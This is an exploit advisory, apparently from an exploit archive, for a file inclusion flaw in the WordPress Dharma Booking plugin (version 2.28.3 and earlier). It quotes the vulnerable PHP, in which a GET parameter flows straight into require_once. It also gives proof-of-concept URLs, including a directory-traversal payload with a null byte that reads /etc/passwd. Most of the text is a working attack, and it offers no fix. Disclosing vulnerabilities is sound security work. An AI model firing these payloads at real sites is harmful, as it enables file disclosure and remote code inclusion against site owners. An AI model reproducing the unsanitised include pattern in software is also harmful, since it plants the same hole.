WordPress Dharma Booking 2.28.3 Remote / Local File Inclusion
Posted on 28 March 2016
# Exploit Title: Wordpress Dharma booking File Inclusion # Date: 03/22/2016 # Exploit Author: AMAR^SHG # Vendor Homepage:https://wordpress.org/plugins/dharma-booking/ <https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software Link : https://wordpress.org/plugins/dharma-booking/ # Version: <=2.28.3 # Tested on: WINDOWS/WAMP dharma-booking/frontend/ajax/gateways/proccess.php's code: <?php include_once('../../../../../../wp-config.php'); $settings = get_option('Dharma_Vars'); echo $settings['paymentAccount']. $settings['gatewayid']; require_once($_GET['gateway'].'.php'); // POC: http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00